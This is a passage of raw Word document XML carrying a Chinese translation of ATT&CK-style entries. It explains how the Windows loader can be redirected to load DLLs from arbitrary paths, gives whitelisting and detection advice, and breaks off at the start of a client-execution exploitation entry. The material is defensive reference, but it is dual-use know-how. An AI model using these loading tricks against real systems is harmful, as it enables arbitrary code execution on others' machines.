                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0674E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>链接库</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EBF3B7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59597955" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C7241D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="065478ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以指示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块加载程序从任意本地路径和任意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（通用命名规则）网络路径加载动态链接库。此功能位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>NTDLL.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>一部分。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win32 API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（），</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）等函数中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AFC8D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块加载器可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以下方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载动态链接库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB857B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中指定动态链接库路径名（完全限定或相对）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09D421" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00C33D98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33D98">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>orward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>EXPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到其它有指定路径名</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全限定或相对，但没有扩展名</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BEF4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用带某</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>目录完全限定或相对路径名</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接或符号链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>program.exe.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此目录包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中指定的动态链接库或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EXPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8135F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>使用内置或外部“应用清单”中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>IMPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>目录中的条目或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>EXPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBF868" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用此功能在系统上执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58057FE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2719"/>
        <w:gridCol w:w="7017"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="4895D4D2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="66089DC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7398D0F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="551690C1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37125993" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56033BB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用能够防止加载未知动态链接库的应用白名单工具来识别并阻止通过此技术执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DBC1B92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147A999E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63F341" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控动态链接库模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会生成大量数据。除非在特定情况下，否则可能无法直接用于防御，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Window</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通常是善意的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难以与恶意行为区分开来。合法软件可能只</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要加载例程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，绑定的动态链接库模块或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统动态链接库。加载有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>偏差的话是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。限定动态链接库模块加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%SystemRoot%</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%ProgramFiles%</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录可防止从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>不安全路径加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B77C893" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其他事件与通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发现的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块加载行为以及可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态链接库写入磁盘的行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关联将为事件提供额外的上下文，这可以帮助确定事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否因</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意行为而</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>产生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D567F93" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>客户端执行利用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="17019880" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6911E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1203</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BDFB8A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20BBEFA8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E5C5B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程漏洞攻击需要一个可通过网络或其他方法（如鱼叉式钓鱼攻击或网页木马</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>攻陷</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
